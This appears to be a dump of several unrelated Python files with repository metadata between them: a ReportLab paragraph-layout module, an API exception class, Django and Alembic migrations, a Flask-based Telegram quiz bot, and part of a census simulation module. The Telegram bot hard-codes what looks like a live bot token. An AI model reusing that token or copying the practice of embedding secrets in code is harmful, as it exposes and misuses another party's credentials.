except IndexError:
maxWidth = maxWidths[-1] # use the last one
if lineBreak:
n = 0
words = []
continue
currentWidth = wordWidth
n = 1
g = f.clone()
maxSize = g.fontSize
if calcBounds:
cbDefn = getattr(g, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
minDescent, maxAscent = imgVRange(cbDefn.height, cbDefn.valign, maxSize)
else:
maxAscent, minDescent = getAscentDescent(g.fontName, maxSize)
else:
maxAscent, minDescent = getAscentDescent(g.fontName, maxSize)
words = [g]
g.text = w[1][1]
for i in w[2:]:
g = i[0].clone()
g.text = i[1]
words.append(g)
fontSize = g.fontSize
if calcBounds:
cbDefn = getattr(g, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
#deal with any leftovers on the final line
if words != []:
if currentWidth > self.width: self.width = currentWidth
lines.append(ParaLines(extraSpace=(maxWidth - currentWidth), wordCount=n,
words=words, fontSize=maxSize, ascent=maxAscent, descent=minDescent))
return ParaLines(kind=1, lines=lines)
return lines
def breakLinesCJK(self, width):
"""Initially, the dumbest possible wrapping algorithm.
Cannot handle font variations."""
if self.debug:
print id(self), "breakLinesCJK"
if not isinstance(width, (list, tuple)):
maxWidths = [width]
else:
maxWidths = width
style = self.style
#for bullets, work out width and ensure we wrap the right amount onto line one
_handleBulletWidth(self.bulletText, style, maxWidths)
if len(self.frags) > 1:
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
calcBounds = autoLeading not in ('', 'off')
return cjkFragSplit(self.frags, maxWidths, calcBounds, self.encoding)
elif not len(self.frags):
return ParaLines(kind=0, fontSize=style.fontSize, fontName=style.fontName,
textColor=style.textColor, lines=[], ascent=style.fontSize, descent=-0.2 * style.fontSize)
f = self.frags[0]
if 1 and hasattr(self, 'blPara') and getattr(self, '_splitpara', 0):
#NB this is an utter hack that awaits the proper information
#preserving splitting algorithm
return f.clone(kind=0, lines=self.blPara.lines)
lines = []
lineno = 0
self.height = 0
f = self.frags[0]
if hasattr(f, 'text'):
text = f.text
else:
text = ''.join(getattr(f, 'words', []))
from reportlab.lib.textsplit import wordSplit
lines = wordSplit(text, maxWidths[0], f.fontName, f.fontSize)
#the paragraph drawing routine assumes multiple frags per line, so we need an
#extra list like this
# [space, [text]]
#
wrappedLines = [(sp, [line]) for (sp, line) in lines]
return f.clone(kind=0, lines=wrappedLines, ascent=f.fontSize, descent=-0.2 * f.fontSize)
def beginText(self, x, y):
return self.canv.beginText(x, y)
def drawPara(self, debug=0):
"""Draws a paragraph according to the given style.
Returns the final y position at the bottom. Not safe for
paragraphs without spaces e.g. Japanese; wrapping
algorithm will go infinite."""
if self.debug:
print id(self), "drawPara", self.blPara.kind
#stash the key facts locally for speed
canvas = self.canv
style = self.style
blPara = self.blPara
lines = blPara.lines
leading = style.leading
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
#work out the origin for line 1
leftIndent = style.leftIndent
cur_x = leftIndent
if debug:
bw = 0.5
bc = Color(1, 1, 0)
bg = Color(0.9, 0.9, 0.9)
else:
bw = getattr(style, 'borderWidth', None)
bc = getattr(style, 'borderColor', None)
bg = style.backColor
#if has a background or border, draw it
if bg or (bc and bw):
canvas.saveState()
op = canvas.rect
kwds = dict(fill=0, stroke=0)
if bc and bw:
canvas.setStrokeColor(bc)
canvas.setLineWidth(bw)
kwds['stroke'] = 1
br = getattr(style, 'borderRadius', 0)
if br and not debug:
op = canvas.roundRect
kwds['radius'] = br
if bg:
canvas.setFillColor(bg)
kwds['fill'] = 1
bp = getattr(style, 'borderPadding', 0)
op(leftIndent - bp,
-bp,
self.width - (leftIndent + style.rightIndent) + 2 * bp,
self.height + 2 * bp,
**kwds)
canvas.restoreState()
nLines = len(lines)
bulletText = self.bulletText
if nLines > 0:
_offsets = getattr(self, '_offsets', [0])
_offsets += (nLines - len(_offsets)) * [_offsets[-1]]
canvas.saveState()
alignment = style.alignment
offset = style.firstLineIndent + _offsets[0]
lim = nLines - 1
noJustifyLast = not (hasattr(self, '_JustifyLast') and self._JustifyLast)
if blPara.kind == 0:
if alignment == TA_LEFT:
dpl = _leftDrawParaLine
elif alignment == TA_CENTER:
dpl = _centerDrawParaLine
elif self.style.alignment == TA_RIGHT:
dpl = _rightDrawParaLine
elif self.style.alignment == TA_JUSTIFY:
dpl = _justifyDrawParaLine
f = blPara
cur_y = self.height - getattr(f, 'ascent', f.fontSize) # TODO fix XPreformatted to remove this hack
if bulletText:
offset = _drawBullet(canvas, offset, cur_y, bulletText, style)
#set up the font etc.
canvas.setFillColor(f.textColor)
tx = self.beginText(cur_x, cur_y)
if autoLeading == 'max':
leading = max(leading, LEADING_FACTOR * f.fontSize)
elif autoLeading == 'min':
leading = LEADING_FACTOR * f.fontSize
#now the font for the rest of the paragraph
tx.setFont(f.fontName, f.fontSize, leading)
ws = getattr(tx, '_wordSpace', 0)
t_off = dpl(tx, offset, ws, lines[0][1], noJustifyLast and nLines == 1)
if f.underline or f.link or f.strike:
xs = tx.XtraState = ABag()
xs.cur_y = cur_y
xs.f = f
xs.style = style
xs.lines = lines
xs.underlines = []
xs.underlineColor = None
# XXX Modified for XHTML2PDF
xs.backgrounds = []
xs.backgroundColor = None
xs.backgroundFontSize = None
xs.strikes = []
xs.strikeColor = None
# XXX Modified for XHTML2PDF
xs.strikeFontSize = None
xs.links = []
xs.link = f.link
canvas.setStrokeColor(f.textColor)
dx = t_off + leftIndent
if dpl != _justifyDrawParaLine: ws = 0
# XXX Never underline!
underline = f.underline
strike = f.strike
link = f.link
if underline:
_do_under_line(0, dx, ws, tx)
if strike:
_do_under_line(0, dx, ws, tx, lm=0.125)
if link: _do_link_line(0, dx, ws, tx)
#now the middle of the paragraph, aligned with the left margin which is our origin.
for i in xrange(1, nLines):
ws = lines[i][0]
t_off = dpl(tx, _offsets[i], ws, lines[i][1], noJustifyLast and i == lim)
if dpl != _justifyDrawParaLine: ws = 0
if underline: _do_under_line(i, t_off + leftIndent, ws, tx)
if strike: _do_under_line(i, t_off + leftIndent, ws, tx, lm=0.125)
if link: _do_link_line(i, t_off + leftIndent, ws, tx)
else:
for i in xrange(1, nLines):
dpl(tx, _offsets[i], lines[i][0], lines[i][1], noJustifyLast and i == lim)
else:
f = lines[0]
cur_y = self.height - getattr(f, 'ascent', f.fontSize) # TODO fix XPreformatted to remove this hack
# default?
dpl = _leftDrawParaLineX
if bulletText:
oo = offset
offset = _drawBullet(canvas, offset, cur_y, bulletText, style)
if alignment == TA_LEFT:
dpl = _leftDrawParaLineX
elif alignment == TA_CENTER:
dpl = _centerDrawParaLineX
elif self.style.alignment == TA_RIGHT:
dpl = _rightDrawParaLineX
elif self.style.alignment == TA_JUSTIFY:
dpl = _justifyDrawParaLineX
else:
raise ValueError("bad align %s" % repr(alignment))
#set up the font etc.
tx = self.beginText(cur_x, cur_y)
xs = tx.XtraState = ABag()
xs.textColor = None
# XXX Modified for XHTML2PDF
xs.backColor = None
xs.rise = 0
xs.underline = 0
xs.underlines = []
xs.underlineColor = None
# XXX Modified for XHTML2PDF
xs.background = 0
xs.backgrounds = []
xs.backgroundColor = None
xs.backgroundFontSize = None
xs.strike = 0
xs.strikes = []
xs.strikeColor = None
# XXX Modified for XHTML2PDF
xs.strikeFontSize = None
xs.links = []
xs.link = None
xs.leading = style.leading
xs.leftIndent = leftIndent
tx._leading = None
tx._olb = None
xs.cur_y = cur_y
xs.f = f
xs.style = style
xs.autoLeading = autoLeading
tx._fontname, tx._fontsize = None, None
dpl(tx, offset, lines[0], noJustifyLast and nLines == 1)
_do_post_text(tx)
#now the middle of the paragraph, aligned with the left margin which is our origin.
for i in xrange(1, nLines):
f = lines[i]
dpl(tx, _offsets[i], f, noJustifyLast and i == lim)
_do_post_text(tx)
canvas.drawText(tx)
canvas.restoreState()
def getPlainText(self, identify=None):
"""
Convenience function for templates which want access
to the raw text, without XML tags.
"""
frags = getattr(self, 'frags', None)
if frags:
plains = []
for frag in frags:
if hasattr(frag, 'text'):
plains.append(frag.text)
return join(plains, '')
elif identify:
text = getattr(self, 'text', None)
if text is None: text = repr(self)
return text
else:
return ''
def getActualLineWidths0(self):
"""
Convenience function; tells you how wide each line
actually is. For justified styles, this will be
the same as the wrap width; for others it might be
useful for seeing if paragraphs will fit in spaces.
"""
assert hasattr(self, 'width'), "Cannot call this method before wrap()"
if self.blPara.kind:
func = lambda frag, w=self.width: w - frag.extraSpace
else:
func = lambda frag, w=self.width: w - frag[0]
return map(func, self.blPara.lines)
if __name__ == '__main__': # NORUNTESTS
def dumpParagraphLines(P):
print 'dumpParagraphLines(<Paragraph @ %d>)' % id(P)
lines = P.blPara.lines
for l, line in enumerate(lines):
line = lines[l]
if hasattr(line, 'words'):
words = line.words
else:
words = line[1]
nwords = len(words)
print 'line%d: %d(%s)\n ' % (l, nwords, str(getattr(line, 'wordCount', 'Unknown'))),
for w in xrange(nwords):
print "%d:'%s'" % (w, getattr(words[w], 'text', words[w])),
print
def fragDump(w):
R = ["'%s'" % w[1]]
for a in ('fontName', 'fontSize', 'textColor', 'rise', 'underline', 'strike', 'link', 'cbDefn', 'lineBreak'):
if hasattr(w[0], a):
R.append('%s=%r' % (a, getattr(w[0], a)))
return ', '.join(R)
def dumpParagraphFrags(P):
print 'dumpParagraphFrags(<Paragraph @ %d>) minWidth() = %.2f' % (id(P), P.minWidth())
frags = P.frags
n = len(frags)
for l in xrange(n):
print "frag%d: '%s' %s" % (
l, frags[l].text, ' '.join(['%s=%s' % (k, getattr(frags[l], k)) for k in frags[l].__dict__ if k != text]))
l = 0
cum = 0
for W in _getFragWords(frags):
cum += W[0]
print "fragword%d: cum=%3d size=%d" % (l, cum, W[0]),
for w in W[1:]:
print '(%s)' % fragDump(w),
print
l += 1
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.lib.units import cm
import sys
TESTS = sys.argv[1:]
if TESTS == []:
TESTS = ['4']
def flagged(i, TESTS=TESTS):
return 'all' in TESTS or '*' in TESTS or str(i) in TESTS
styleSheet = getSampleStyleSheet()
B = styleSheet['BodyText']
style = ParagraphStyle("discussiontext", parent=B)
style.fontName = 'Helvetica'
if flagged(1):
text = '''The <font name=courier color=green>CMYK</font> or subtractive method follows the way a printer
mixes three pigments (cyan, magenta, and yellow) to form colors.
Because mixing chemicals is more difficult than combining light there
is a fourth parameter for darkness. For example a chemical
combination of the <font name=courier color=green>CMY</font> pigments generally never makes a perfect
black -- instead producing a muddy color -- so, to get black printers
don't use the <font name=courier color=green>CMY</font> pigments but use a direct black ink. Because
<font name=courier color=green>CMYK</font> maps more directly to the way printer hardware works it may
be the case that &| & | colors specified in <font name=courier color=green>CMYK</font> will provide better fidelity
and better control when printed.
'''
P = Paragraph(text, style)
dumpParagraphFrags(P)
aW, aH = 456.0, 42.8
w, h = P.wrap(aW, aH)
dumpParagraphLines(P)
S = P.split(aW, aH)
for s in S:
s.wrap(aW, aH)
dumpParagraphLines(s)
aH = 500
if flagged(2):
P = Paragraph("""Price<super><font color="red">*</font></super>""", styleSheet['Normal'])
dumpParagraphFrags(P)
w, h = P.wrap(24, 200)
dumpParagraphLines(P)
if flagged(3):
text = """Dieses Kapitel bietet eine schnelle <b><font color=red>Programme :: starten</font></b>
<onDraw name=myIndex label="Programme :: starten">
<b><font color=red>Eingabeaufforderung :: (>>>)</font></b>
<onDraw name=myIndex label="Eingabeaufforderung :: (>>>)">
<b><font color=red>>>> (Eingabeaufforderung)</font></b>
<onDraw name=myIndex label=">>> (Eingabeaufforderung)">
Einführung in Python <b><font color=red>Python :: Einführung</font></b>
<onDraw name=myIndex label="Python :: Einführung">.
Das Ziel ist, die grundlegenden Eigenschaften von Python darzustellen, ohne
sich zu sehr in speziellen Regeln oder Details zu verstricken. Dazu behandelt
dieses Kapitel kurz die wesentlichen Konzepte wie Variablen, Ausdrücke,
Kontrollfluss, Funktionen sowie Ein- und Ausgabe. Es erhebt nicht den Anspruch,
umfassend zu sein."""
P = Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(4):
text = '''Die eingebaute Funktion <font name=Courier>range(i, j [, stride])</font><onDraw name=myIndex label="eingebaute Funktionen::range()"><onDraw name=myIndex label="range() (Funktion)"><onDraw name=myIndex label="Funktionen::range()"> erzeugt eine Liste von Ganzzahlen und füllt sie mit Werten <font name=Courier>k</font>, für die gilt: <font name=Courier>i <= k < j</font>. Man kann auch eine optionale Schrittweite angeben. Die eingebaute Funktion <font name=Courier>xrange()</font><onDraw name=myIndex label="eingebaute Funktionen::xrange()"><onDraw name=myIndex label="xrange() (Funktion)"><onDraw name=myIndex label="Funktionen::xrange()"> erfüllt einen ähnlichen Zweck, gibt aber eine unveränderliche Sequenz vom Typ <font name=Courier>XRangeType</font><onDraw name=myIndex label="XRangeType"> zurück. Anstatt alle Werte in der Liste abzuspeichern, berechnet diese Liste ihre Werte, wann immer sie angefordert werden. Das ist sehr viel speicherschonender, wenn mit sehr langen Listen von Ganzzahlen gearbeitet wird. <font name=Courier>XRangeType</font> kennt eine einzige Methode, <font name=Courier>s.tolist()</font><onDraw name=myIndex label="XRangeType::tolist() (Methode)"><onDraw name=myIndex label="s.tolist() (Methode)"><onDraw name=myIndex label="Methoden::s.tolist()">, die seine Werte in eine Liste umwandelt.'''
aW = 420
aH = 64.4
P = Paragraph(text, B)
dumpParagraphFrags(P)
w, h = P.wrap(aW, aH)
print 'After initial wrap', w, h
dumpParagraphLines(P)
S = P.split(aW, aH)
dumpParagraphFrags(S[0])
w0, h0 = S[0].wrap(aW, aH)
print 'After split wrap', w0, h0
dumpParagraphLines(S[0])
if flagged(5):
text = '<para> %s <![CDATA[</font></b>& %s < >]]></para>' % (chr(163), chr(163))
P = Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(6):
for text in [
'''Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''',
'''Here comes <font face="Helvetica" size="14pt">Helvetica 14</font> with <Strong>strong</Strong> <em>emphasis</em>.''',
'''Here comes <font face="Courier" size="3cm">Courier 3cm</font> and normal again.''',
]:
P = Paragraph(text, styleSheet['Normal'], caseSensitive=0)
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(7):
text = """<para align="CENTER" fontSize="24" leading="30"><b>Generated by:</b>Dilbert</para>"""
P = Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(8):
text = """- bullet 0<br/>- bullet 1<br/>- bullet 2<br/>- bullet 3<br/>- bullet 4<br/>- bullet 5"""
P = Paragraph(text, styleSheet['Normal'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
S = P.split(6 * 72, h / 2.0)
print len(S)
dumpParagraphLines(S[0])
dumpParagraphLines(S[1])
if flagged(9):
text = """Furthermore, the fundamental error of
regarding <img src="../docs/images/testimg.gif" width="3" height="7"/> functional notions as
categorial delimits a general
convention regarding the forms of the<br/>
grammar. I suggested that these results
would follow from the assumption that"""
P = Paragraph(text, ParagraphStyle('aaa', parent=styleSheet['Normal'], align=TA_JUSTIFY))
dumpParagraphFrags(P)
w, h = P.wrap(6 * cm - 12, 9.7 * 72)
dumpParagraphLines(P)
if flagged(10):
text = """a b c\xc2\xa0d e f"""
P = Paragraph(text, ParagraphStyle('aaa', parent=styleSheet['Normal'], align=TA_JUSTIFY))
dumpParagraphFrags(P)
w, h = P.wrap(6 * cm - 12, 9.7 * 72)
dumpParagraphLines(P)
| [
"[email protected]"
] | |
c35827798e41b221d01c7605547d9563c1b93e01 | c040de12811afa588a23ad6c0cd4fdc849ab469f | /saklient/cloud/errors/usernotspecifiedexception.py | 4bd94f412d92c987223a12491a2dad83d3c4cda1 | [
"MIT"
] | permissive | toshitanian/saklient.python | 3707d1113744122c5ab1ae793f22c6c3a0f65bc4 | 287c56915dd825d676eddc538cbb33b483803dc2 | refs/heads/master | 2021-05-28T08:13:16.851101 | 2014-10-09T09:54:03 | 2014-10-09T09:54:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 790 | py | # -*- coding:utf-8 -*-
from ...errors.httpforbiddenexception import HttpForbiddenException
# module saklient.cloud.errors.usernotspecifiedexception
class UserNotSpecifiedException(HttpForbiddenException):
## 要求された操作は許可されていません。このAPIはユーザを特定できる認証方法でアクセスする必要があります。
## @param {int} status
# @param {str} code=None
# @param {str} message=""
def __init__(self, status, code=None, message=""):
super(UserNotSpecifiedException, self).__init__(status, code, "要求された操作は許可されていません。このAPIはユーザを特定できる認証方法でアクセスする必要があります。" if message is None or message == "" else message)
| [
"[email protected]"
] | |
cb17300b448fc5e8bf2a11a3c0e264dee6949afd | 20250e3dee97220e908d48e4a0d09fe1cbbf0ec0 | /app/migrations/0014_grupos.py | b7fd3449055bee2774d218416474b149b04ea48f | [] | no_license | sergio200086/Sistema-academico | 3e7af83301ddc7f380d03bad74485712b39b9aa6 | 70d03a67de6b72dff738560118f620c2fe7b016f | refs/heads/master | 2023-07-25T19:59:05.610314 | 2021-09-03T17:04:29 | 2021-09-03T17:04:29 | 402,836,941 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | # Generated by Django 3.2 on 2021-05-18 19:57
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app', '0013_profesores'),
]
operations = [
migrations.CreateModel(
name='Grupos',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('codigogrupo', models.CharField(max_length=50)),
('asignatura', models.CharField(max_length=50)),
('semestre', models.CharField(max_length=50)),
('profesorgrupo', models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='profesorgrupo', to='app.profesores')),
],
),
]
| [
"[email protected]"
] | |
d15e9de176089c15a1ec2cf8cb55e7e06d17da4a | 06b6b2e090724557683e582641acecd3a0eecb59 | /src/calcularfactura.py | 2ee919ca1e1efe9919f7d9d11d9b18a4b891145b | [] | no_license | mmorac/factura | d0f6f8b0c50f74a9c695088d3366ed588c53f2e1 | 9c405575d072d262bdf4db01881701591cbd67d6 | refs/heads/master | 2022-04-25T18:34:49.474668 | 2020-04-24T08:23:43 | 2020-04-24T08:23:43 | 258,345,468 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,533 | py | import pandas as pd
import obtenerhoras
from datetime import datetime
def calcularfactura(fecha_inicio, fecha_fin):
tabla = obtenerhoras.obtenerhoras("../archivos/factura.xlsx")
if("-" in fecha_inicio):
now = datetime.now()
fecha_inicio = fecha_inicio.split("-")
fecha_fin = fecha_fin.split("-")
if(int(fecha_inicio[1]) > now.month + 1):
f_inicio = str(now.year - 1) + "-" + fecha_inicio[1] + "-" + fecha_inicio[0]
else:
f_inicio = str(now.year) + "-" + fecha_inicio[1] + "-" + fecha_inicio[0]
f_fin = str(now.year) + "-" + fecha_fin[1] + "-" + fecha_fin[0]
elif("/" in fecha_inicio):
now = datetime.now()
fecha_inicio = fecha_inicio.split("/")
fecha_fin = fecha_fin.split("/")
f_inicio = str(now.year) + "-" + fecha_inicio[1] + "-" + fecha_inicio[0]
f_fin = str(now.year) + "-" + fecha_fin[1] + "-" + fecha_fin[0]
agregar = False
sumar = []
for i in range(len(tabla.columns)):
if(tabla.columns[i] == f_inicio):
agregar = True
elif(tabla.columns[i-1] == f_fin):
agregar = False
if(agregar):
sumar.append(tabla.columns[i])
tabla["Total Hours"] = tabla[sumar].sum(axis=1)
tabla["Total"] = tabla["Total Hours"] * tabla["Rate"]
sumar.insert(0, "Rate")
sumar.insert(0, "Resource Name")
sumar.insert(len(sumar), "Total Hours")
sumar.insert(len(sumar), "Total")
resultado = tabla[sumar]
return resultado
| [
"[email protected]"
] | |
9c5ad899ca1d6c2c86cb40d5304177a1ce2f9f26 | d4945242794561f7e8621b7cace4c7c9d5c9e7ab | /testbucket.py | 4ab9dfdb4c82d77b57b85ee3b0501cd64b75b242 | [] | no_license | synthicap/TestStackBot | b275a9438b786a9201da4f81f57971c732b4272c | 7fbbebdfc953eb05385e028e7569007869e52acc | refs/heads/master | 2021-06-16T08:09:23.898823 | 2017-05-04T21:55:59 | 2017-05-04T21:55:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,865 | py | import os
import pickle
from secrets import token_urlsafe
import telebot
from flask import Flask, request
from redis import from_url
from telebot.types import Update, ReplyKeyboardMarkup, KeyboardButton
class Task:
is_text = None
text = None
correct = None
class Test:
tasks = []
results = {}
bot = telebot.TeleBot('345467048:AAEFochiYcGcP7TD5JqYwco8E56cOYCydrk')
app = Flask(__name__)
redis = from_url(os.environ['REDIS_URL'])
tests = {}
@bot.message_handler(commands=['start', 'help'])
def start(message):
text = '/new - create new test\n' \
'/pass - pass the test\n' \
'/mres - my result of the test\n' \
'/res - all results of the test\n' \
'/del - delete the test\n'
bot.send_message(message.chat.id, text)
@bot.message_handler(commands=['new'])
def new_test(message):
try:
test = Test()
test.key = token_urlsafe(8)
test.num = int(message.text.split()[-1])
tests['key'] = test
bot.send_message(message.chat.id, f'Key: {test.key}')
msg = bot.send_message(message.chat.id, 'Enter the task text')
bot.register_next_step_handler(msg, set_task_text)
except Exception as e:
bot.reply_to(message, str(e) + ' 0')
def set_task_text(message):
try:
task = Task()
task.is_text = message.content_type == 'text'
if task.is_text:
task.text = message.text
else:
task.text = message.photo[0].file_id
tests['key'].tasks.append(task)
msg = bot.send_message(message.chat.id, 'Enter the task correct answer')
bot.register_next_step_handler(msg, set_task_correct)
'''markup = ReplyKeyboardMarkup(one_time_keyboard=True, row_width=4)
markup.row(KeyboardButton(a) for a in answer)'''
except Exception as e:
bot.reply_to(message, str(e) + ' 2')
def set_task_correct(message):
try:
test = tests['key']
answer = message.text
if answer[0] == ':':
answer = set(answer.split()[1:])
test.tasks[-1].correct = answer
if test.num > 1:
test.num -= 1
msg = bot.send_message(message.chat.id, 'Enter the task text')
bot.register_next_step_handler(msg, set_task_text)
else:
key = test.key
del test.key
del test.num
del tests['key']
redis[key] = pickle.dumps(test)
bot.send_message(message.chat.id, 'Test successfully created!')
bot.send_message(message.chat.id, str(len(test.tasks)))
except Exception as e:
bot.reply_to(message, str(e) + ' 3')
@bot.message_handler(commands=['pass'])
def get_test(message):
try:
key = message.text.split()[-1]
test = pickle.loads(redis[key])
test.key = key
test.num = len(test.tasks)
test.ctasks = test.tasks.copy()
tests['key'] = test
test.results[message.from_user.username] = 0
bot.send_message(message.chat.id, f'Let\'s start the test, number of tasks: {test.num}')
task = test.tasks[0]
if task.is_text:
msg = bot.send_message(message.chat.id, task.text)
else:
msg = bot.send_photo(message.chat.id, task.text)
bot.register_next_step_handler(msg, get_task)
except Exception as e:
bot.reply_to(message, str(e) + ' 1')
def get_task(message):
try:
test = tests['key']
tasks = test.ctasks
name = message.from_user.username
correct = tasks.pop(0).correct
if correct is set:
answer = set(message.text.split())
else:
answer = message.text
test.results[name] += answer == correct
if tasks:
task = test.tasks[0]
if task.is_text:
msg = bot.send_message(message.chat.id, task.text)
else:
msg = bot.send_photo(message.chat.id, task.text)
bot.register_next_step_handler(msg, get_task)
else:
bot.send_message(message.chat.id, f'Your result is: {test.results[name]} / {test.num}')
key = test.key
del test.key
del test.num
del test.ctasks
del tests['key']
redis[key] = pickle.dumps(test)
except Exception as e:
bot.reply_to(message, str(e) + '3')
@bot.message_handler(commands=['mres'])
def get_result(message):
try:
test = pickle.loads(redis[message.text.split()[-1]])
result = test.results[message.from_user.username]
num = len(test.tasks)
bot.send_message(message.chat.id, f'Your result is: {result} / {num}')
except Exception as e:
bot.reply_to(message, str(e) + '1')
@bot.message_handler(commands=['res'])
def get_list_results(message):
try:
test = pickle.loads(redis[message.text.split()[-1]])
num = len(test.tasks)
items = test.results.items()
if num:
bot.send_message(message.chat.id, 'Results:\n' + ''.join(f'{i[0]}: {i[1]} / {num}\n' for i in items))
else:
bot.send_message(message.chat.id, 'No results')
except Exception as e:
bot.reply_to(message, str(e) + '1')
@bot.message_handler(commands=['del'])
def delete_test(message):
try:
bot.send_message(message.chat.id, 'Test successfully deleted!')
except Exception as e:
bot.reply_to(message, str(e) + '1')
@app.route('/update', methods=['POST'])
def update():
bot.process_new_updates([Update.de_json(request.stream.read().decode('utf-8'))])
return '', 200
@app.route('/')
def index():
redis.flushdb()
bot.remove_webhook()
bot.set_webhook(url='https://teststackbot.herokuapp.com/update')
return '', 200
if __name__ == '__main__':
app.run()
| [
"[email protected]"
] | |
9b0e3331a7b373bdb5062de6b475a67be0194b67 | aca7781f4341a2d9e2c4e9aa663efe1fbfc20b26 | /migration/versions/617d6d1ed309_first.py | b37fe959fe46a7aba66867c3cfa0854280477307 | [] | no_license | rhezaas/hcl-user-service | 23944798939f85b875b8c65fd9a2ce0d33436485 | 3a841e52d4a593a4d2873a19152935f0680cda79 | refs/heads/master | 2023-08-16T23:31:34.994984 | 2021-03-01T16:20:24 | 2021-03-01T16:20:24 | 330,072,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,538 | py | """first
Revision ID: 617d6d1ed309
Revises:
Create Date: 2021-01-09 19:36:33.085083
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '617d6d1ed309'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.execute('CREATE SCHEMA IF NOT EXISTS "user"')
op.create_table(
'user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('firstname', sa.String(length=100), nullable=False),
sa.Column('lastname', sa.String(length=100), nullable=False),
sa.Column('profile', sa.Text(), nullable=True),
sa.Column('phone', sa.String(length=50), nullable=False),
sa.Column('deleted_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id'),
schema='user'
)
op.create_table(
'account',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('username', sa.String(length=100), nullable=False),
sa.Column('password', sa.String(length=100), nullable=False),
sa.Column('token', sa.String(length=100), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['user.user.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('user_id'),
schema='user'
)
op.create_table(
'image',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('image', sa.Text(), nullable=False),
sa.Column('width', sa.Integer(), nullable=True),
sa.Column('height', sa.Integer(), nullable=True),
sa.Column('deleted_at', sa.DateTime(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['user.user.id'], ),
sa.PrimaryKeyConstraint('id'),
schema='user'
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('image', schema='user')
op.drop_table('account', schema='user')
op.drop_table('user', schema='user')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
af2ce57e29ae463e1877eb93020a815ea4ffd575 | 921a8ebd5add1cd15db7e558801bf6f5167073d7 | /hq.py | d9093527875528007031eec0e0b09be2fde29b71 | [] | no_license | ONSdigital/FOCUS | 768a5713ec8909cbcdb6b6af882879dda0647576 | d6920bf036abb49872a1f4908fdfdff8135c0f68 | refs/heads/master | 2021-09-03T20:02:07.212625 | 2017-11-13T16:39:54 | 2017-11-13T16:39:54 | 50,437,640 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,091 | py | """Module used to store the classes and other code related to any aspect of the census hq operation"""
import output_options as oo
import helper as h
import datetime
from simpy.util import start_delayed
import math
def ret_rec(household, rep):
# print out every 100000 returns?
#if rep.total_responses % 100000 == 0:
#print(rep.total_responses)
if oo.record_active_summary:
# add household to summary of responses
for key, value in rep.active_summary.items():
value[str(getattr(household, key))][math.floor(rep.env.now / 24)] += 1
for key, value in rep.active_totals.items():
value[str(getattr(household, key))] += 1
if oo.record_active_paper_summary and not household.digital:
for key, value in rep.active_paper_summary.items():
value[str(getattr(household, key))][math.floor(rep.env.now / 24)] += 1
for key, value in rep.active_paper_totals.items():
value[str(getattr(household, key))] += 1
household.return_received = True
if oo.record_return_received:
rep.output_data['Return_received'].append(oo.generic_output(rep.reps,
household.district.district,
household.la,
household.lsoa,
household.digital,
household.hh_type,
household.hh_id,
rep.env.now))
# currently every return gets counted as a response as soon as it is received - this may need to change
household.responded = True
rep.total_responses += 1
household.district.total_responses += 1
# check size of output data - if over an amount, size or length write to file?
if oo.record_responded:
rep.output_data['Responded'].append(oo.generic_output(rep.reps,
household.district.district,
household.la,
household.lsoa,
household.digital,
household.hh_type,
household.hh_id,
rep.env.now))
# checks size of output and writes to file if too large
if (h.dict_size(rep.output_data)) > rep.max_output_file_size:
h.write_output(rep.output_data, rep.output_path, rep.run)
yield rep.env.timeout(0)
# so returned and we know it! remove from simulation??
class Adviser(object):
"""Call centre adviser"""
def __init__(self, rep, id_num, input_data, ad_type):
self.rep = rep
self.id_num = id_num
